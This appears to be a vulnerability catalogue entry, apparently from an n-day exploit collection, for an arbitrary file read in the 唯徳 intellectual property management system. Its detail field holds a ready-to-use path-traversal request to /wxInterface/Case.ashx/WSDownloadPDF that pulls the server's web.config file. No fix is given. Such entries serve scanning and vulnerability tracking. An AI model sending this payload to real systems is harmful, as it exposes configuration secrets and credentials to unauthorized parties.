vendor = "唯徳"
name = "唯徳知识产权管理系统任意文件读取"
type = "任意文件读取"
version = "未知"
path = "/wxInterface/Case.ashx:WSDownloadPDF"
detail = "/wxInterface/Case.ashx/WSDownloadPDF?file_type=1&app_no=../../&file=web.config"
fix = "未知"
date = "0707"
label = "nday"
verifier = "AdySec"
